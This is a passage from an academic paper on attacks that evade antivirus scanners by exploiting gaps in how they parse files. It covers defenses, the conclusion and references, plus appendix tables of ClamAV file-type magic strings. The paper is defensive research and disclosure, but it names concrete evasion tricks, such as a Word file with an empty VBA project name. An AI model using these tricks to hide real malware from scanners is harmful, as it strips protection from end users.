An alternative to parsing is to submit each file to a virtual environment that lets it be parsed by the actual application or loaded by the guest OS, then tries to detect malware from outside the OS (e.g., using virtual-machine introspection [13]). This approach defeats chameleon and werewolf attacks only if all of the following hold: (1) the guest OS and applications are exact replicas of the protected end host; (2) if there are multiple end host configurations (e.g., if different hosts may use different applications or versions of the same application to access a given file), every configuration is replicated exactly; (3) the analysis environment exactly replicates human behavior, including user responses to "repair corrupted file" messages; and (4) the environment is not vulnerable to split-personality evasion [8]. Production deployment of network- or cloud-based malware detectors that satisfy all of these requirements is a hard problem beyond the scope of this paper.

C. Defend in depth

Many attacks are detector-specific, thus applying multiple detectors to the same file, as advocated by CloudAV [21], may provide better protection, at a significant performance cost. Some of our attacks, however, evaded all 36 tested AV scanners. Furthermore, several non-interfering attacks can be combined in a single file, enabling it to evade multiple detectors.
IX. HOST-BASED DEFENSES AGAINST WEREWOLF ATTACKS

One of the main purposes of network-based deployment of malware detectors is to reduce the need for host-based detection. Nevertheless, we discuss host-based defenses for completeness. Host-based techniques (such as continuously scanning the memory for signs of malicious behavior) are effective because the detector operates during or after the file has been processed and thus does not need to independently replicate the results of file processing. Therefore, host-based detectors are better equipped to deal with chameleon and werewolf attacks. In practice, however, many are vulnerable to the same attacks as their network-based versions.

A. On-access scanning

A typical on-access scanner intercepts file-open, file-close, and file-execute system calls and scans their targets for infection. On-access scanners are effective against werewolf attacks on archive formats only because they do not need to parse archives. After the user has extracted the contents, she will try to open and/or execute them. At this point, the scanner intercepts the open/execute system call and detects the virus before any harm is done. This is a special case where the results of parsing (i.e., the extracted files) are stored in the file system and thus accessible to the scanner.

Unfortunately, as we show in this paper, werewolf attacks affect not only archive formats, but also ELF, PE, and MS Office (among others). For these formats, existing on-access scanners do not have access to the internal data representation after the OS or application has parsed the file and must rely on their own parsing, opening the door to werewolf attacks. For example, on-access scanning in ClamAV uses a Linux kernel module called Dazuko that scans the target files of open, close, and exec system calls. In our experiments, ClamAV successfully detected an infected file unpacked from a malformed archive into the monitored directory, but failed to detect an infected Word file with an empty VBA project name (see Section VI-B) even when opened by OpenOffice from the same directory.

B. Tight integration with applications

When running on the host, a malware detector can benefit from tighter integration with the file-processing logic of the OS and applications. One plausible approach is for the OS and application implementors to refactor their code so that the detector can be invoked in the middle of file processing and given access to the results of parsing. Unfortunately, this approach is insecure against malware that exploits vulnerabilities in the parsing code itself. For example, a detector that waits until the JPEG library has parsed a JPEG file before checking that the file is safe cannot protect the library from malicious JPEGs that use bugs to take it over, defeating the purpose of malware detection. Furthermore, tight integration between applications and external functionality which is not integral to their operation adds complexity and is contrary to the principles of modular system design.

Figure 4. Application refactoring to mitigate werewolf and chameleon attacks on host- and cloud-based malware scanners.

Privilege separation can help solve this "chicken and egg" dilemma if the application is refactored so that the parsing code runs at lower privilege than the rest of the application. The parser can invoke a host- or even cloud-based malware detector and send the results of parsing for scanning, as shown in Fig. 4. After the detector declares them clean, they are passed on to the rest of the application. This architecture avoids the need to replicate application-specific parsing in the detector. Even if malware exploits a vulnerability in the parser, it will only gain the ability to perform low-privilege operations that the parser is allowed to perform. Implementing this architecture requires that the antivirus vendors support a standardized interface through which applications can submit parsed data for analysis. Some existing archiving applications such as WinRAR and WinZip support invocation of command-line antivirus scanners, but this functionality is not yet available in non-archiving applications.

Another approach is for the application and the detector to use the same parsing code, e.g., by employing the same parsing library. For instance, multiple-streams and random-garbage attacks do not work against ClamAV because ClamAV uses the libz library for parsing GZIP files. The origins of libz are similar to gzip, thus ClamAV effectively uses the same parsing code as the application. This approach suffers from most of the flaws outlined in Section VIII-A (the detector must know exactly which parsing code is used by the application and must be updated whenever the application's parsing logic changes), but these flaws may be easier to mitigate in a host-based deployment.
X. CONCLUSION

We presented two classes of practical attacks against automated malware detectors. They enable even unobfuscated, easily recognizable malware to evade detection by placing it in specially crafted files that are processed differently by the detector and the end host. All 36 antivirus scanners in our experimental testing proved vulnerable to these attacks, yielding a total of 45 different exploits, almost all of which are reported here for the first time. The rest have been known only anecdotally and never been systematically analyzed.

We argue that semantic gaps in file processing are a fundamental flaw of network- and cloud-based malware detectors, regardless of the actual detection technique they use. As long as the detector analyzes files on its own, independently of the actual operating systems and applications on the end hosts, it faces the insurmountable challenge of correctly replicating their file-processing logic on every possible input. Development of malware detectors that do not suffer from this gap (for example, if they operate on exact virtual copies of protected systems that process each file using the actual applications and faithfully emulate human response, or if they are integrated with the parsing logic of actual applications) is an interesting topic for future research.

Acknowledgments. The research described in this paper was partially supported by the NSF grants CNS-0746888 and CNS-0905602, Google research award, and the MURI program under AFOSR Grant No. FA9550-08-1-0352.
REFERENCES

[1] S. Alvarez. Antivirus insecurity. http://events.ccc.de/camp/2007/Fahrplan/attachments/1324-AntivirusInSecuritySergioshadownAlvarez.pdf, 2007.
[2] S. Alvarez and T. Zoller. The death of AV defense in depth - revisiting anti-virus software. http://cansecwest.com/csw08/csw08-alvarez.pdf, 2008.
[3] avast! Anti-virus engine malformed ZIP/CAB archive virus detection bypass. http://secunia.com/advisories/17126/, 2005.
[4] A. Barth, J. Caballero, and D. Song. Secure content sniffing for web browsers, or how to stop papers from reviewing themselves. In S&P, 2009.
[5] D. Bates, A. Barth, and C. Jackson. Regular expressions considered harmful in client-side XSS filters. In WWW, 2010.
[6] D. Brumley, J. Caballero, Z. Liang, J. Newsome, and D. Song. Towards automatic discovery of deviations in binary implementations with applications to error detection and fingerprint generation. In USENIX Security, 2007.
[7] C. Cadar, D. Dunbar, and D. Engler. KLEE: Unassisted and automatic generation of high-coverage tests for complex systems programs. In OSDI, 2008.
[8] X. Chen, J. Andersen, Z. Mao, M. Bailey, and J. Nazario. Towards an understanding of anti-virtualization and anti-debugging behavior in modern malware. In DSN, 2008.
[9] ClamAV. http://www.clamav.net.
[10] http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=evasion, 2012.
[11] EICAR - The Anti-Virus or Anti-Malware Test File. http://www.eicar.org/antivirustestfile.htm.
[12] T. Garfinkel. Traps and pitfalls: Practical problems in system call interposition based security tools. In NDSS, 2003.
[13] T. Garfinkel and M. Rosenblum. A virtual machine introspection based architecture for intrusion detection. In NDSS, 2003.
[14] M. Gavin. Recognizing corrupt and malformed PDF files. http://labs.appligent.com/presentations/recognizingmalformedpdff.pdf.
[15] P. Hooimeijer, B. Livshits, D. Molnar, P. Saxena, and M. Veanes. Fast and precise sanitizer analysis with BEK. In USENIX Security, 2011.
[16] M. Hypponen. Retroviruses - how viruses fight back. http://www.hypponen.com/staff/hermanni/more/papers/retro.htm, 1994.
[17] G. Kessler. File signatures table. http://www.garykessler.net/library/filesigs.html, 2012.
[18] McAfee VirusScan vulnerability. http://www.pc1news.com/news/0665/mcafeevirusscanvulnerability-allow-compressed-archives-to-bypass-the-scan-engine.html, 2009.
[19] J. Nazario. Mime sniffing and phishing. http://asert.arbornetworks.com/2009/03/mime-sniffing-and-phishing/, 2009.
[20] J. Oberheide, M. Bailey, and F. Jahanian. PolyPack: An automated online packing service for optimal antivirus evasion. In WOOT, 2009.
[21] J. Oberheide, E. Cooke, and F. Jahanian. CloudAV: N-version antivirus in the network cloud. In USENIX Security, 2008.
[22] J. Oberheide and F. Jahanian. Remote fingerprinting and exploitation of mail server antivirus engines. http://jon.oberheide.org/files/umich09-mailav.pdf, 2009.
[23] Microsoft patch breaks Impress/PowerPoint compatibility. http://user.services.openoffice.org/en/forum/viewtopic.php?t=36515, 2010.
[24] OpenOffice - MS interoperability bugs. http://openoffice.org/bugzilla/buglist.cgi?keywords=msinteroperability, 2011.
[25] W. Palant. The hazards of MIME sniffing. http://adblockplus.org/blog/the-hazards-of-mime-sniffing, 2007.
[26] S. Porst. How to really obfuscate your PDF malware. http://www.recon.cx/2010/slides/recon2010sebastianporst.pdf, 2010.
[27] T. Ptacek and T. Newsham. Insertion, evasion, and denial of service: Eluding network intrusion detection, 1998.
[28] T. Scholte, D. Balzarotti, and E. Kirda. Quo vadis? A study of the evolution of input validation vulnerabilities in Web applications. In FC, 2011.
[29] C. Sheehan. Pimp my PE: Parsing malicious and malformed executables. http://research.sunbelt-software.com/ViperSDK/Pimp%20My%20PE.ppt, 2007.
[30] IE content-type logic. http://blogs.msdn.com/b/ie/archive/2005/02/01/364581.aspx, 2005.
[31] P. Ször and P. Ferrie. Hunting for metamorphic. http://www.symantec.com/avcenter/reference/hunting.for.metamorphic.pdf.
[32] VirusTotal. http://www.virustotal.com.
[33] VX Heavens. http://vx.netlux.org/vl.php.
[34] R. Watson. Exploiting concurrency vulnerabilities in system call wrappers. In WOOT, 2007.
[35] J. Weinberger, P. Saxena, D. Akhawe, M. Finifter, R. Shin, and D. Song. A systematic analysis of XSS sanitization in Web application frameworks. In ESORICS, 2011.
[36] A. Wheeler and N. Mehta. 0wning antivirus. http://www.blackhat.com/presentations/bh-europe-05/bh-eu-05-wheeler-mehta-up.pdf, 2005.
[37] F. Xue. Attacking antivirus. http://www.blackhat.com/presentations/bh-europe-08/Feng-Xue/Whitepaper/bh-eu-08-xue-WP.pdf, 2008.
[38] Anti-virus software may not properly scan malformed zip archives. http://www.kb.cert.org/vuls/id/968818, 2005.
[39] Musing on information security. http://blog.zoller.lu/search/label/Advisory, 2009.
APPENDIX

Table XIII. EXAMPLES OF CLAMAV'S FIXED-OFFSET "MAGIC STRINGS" IN THE ORDER THEY ARE CHECKED.

Order  Offset  Length  File type        Magic content
1      0       9       mirc.ini         5b616c69617365735d
2      257     5       TAR-POSIX        7573746172
3      0       5       RTF              7b5c727466
4      0       14      SIP log          5349502d48495420285349502f48
5      8       4       SIS              19040010
6      6       4       JPEG             4a464946
7      6       4       JPEG             45786966
8      0       3       MP3              fffb90
9      0       3       JPEG             ffd8ff
10     0       8       OLE2 container   d0cf11e0a1b11ae1
11     0       8       CryptFF          b6b9acaefeffffff
12     0       4       PNG              89504e47
13     0       4       ELF              7f454c46
14     0       4       TNEF             789f3e22
15     0       14      VPOP3 (DOS)      763a0d0a52656365697665643a20
16     0       13      VPOP3 (UNIX)     763a0a52656365697665643a20
17     0       6       UUencoded        626567696e20
18     0       2       ARJ              60ea
19     0       8       Mail             582d5549444c3a20
20     0       11      Symantec         582d53796d616e7465632d
21     0       9       Mail             582d53696576653a20
22     0       11      Mail             582d5265616c2d546f3a20
23     0       15      Mail             582d4f726967696e616c2d546f3a20
24     0       17      Mail             582d456e76656c6f70652d46726f6d3a20
25     0       5       EVS mail         582d455653
26     0       17      Mail             582d4170706172656e746c792d546f3a20
27     0       4       Mail             546f3a20
28     0       9       Mail             5375626a6563743a20
29     0       4       compress.exe'd   535a4444
30     0       13      Maildir          52657475726e2d706174683a20
31     0       13      Maildir          52657475726e2d506174683a20
32     0       10      Raw mail         52656365697665643a20
33     0       4       RAR              52617221
34     0       4       RIFX             52494658
35     0       4       RIFF             52494646
36     0       8       ZIP              504b3030504b0304
37     0       4       ZIP              504b0304
38     0       4       Ogg Stream       4f676753
39     0       12      Mail             4d6573736167652d49643a20
40     0       12      Mail             4d6573736167652d49443a20
41     0       2       MS-EXE           4d5a
42     0       4       MS CAB           4d534346
43     0       4       MS CHM           49545346
44     0       3       MP3              494433
45     0       26      Qmail bounce     48692e20546869732069732074686520716d61696c2d73656e64
46     0       3       GIF              474946
47     0       6       Exim mail        46726f6d3a20
48     0       5       MBox             46726f6d20

Table XIV. "MAGIC STRINGS" FOR FILE TYPES NOT SUPPORTED BY CLAMAV (SOURCE: [17]). MULTIPLE OFFSETS SEPARATED BY "," INDICATE THAT THE MAGIC CONTENT CAN APPEAR AT ANY OF THEM.

Offset              Length  File type        Magic content
0                   8       MS Office files  D0CF11E0A1B11AE1
0                   2       TAR.Z (LZW)      1F9D
0                   2       TAR.Z (LZH)      1FA0
0                   8       AR, MS Coff      213C617263683E0A
0                   4       PACK             5041434B
2                   3       LZA, LZH         2D6C68
0                   6       7Zip             377ABCAF271C
526                 5       PKZIP SFX        504B537058
29,152              6       WinZip           57696E5A6970
30                  6       PKLITE           504B4C495445
0                   4       PKZIP            504B0304
0                   4       Zoo              5A4F4F20
4                   8       Quicktime MOV    6D6F6F76
0,30                23      EPS              252150532D41646F62652D332E3020455053462D332030
32769,34817,36865   5       ISO              4344303031
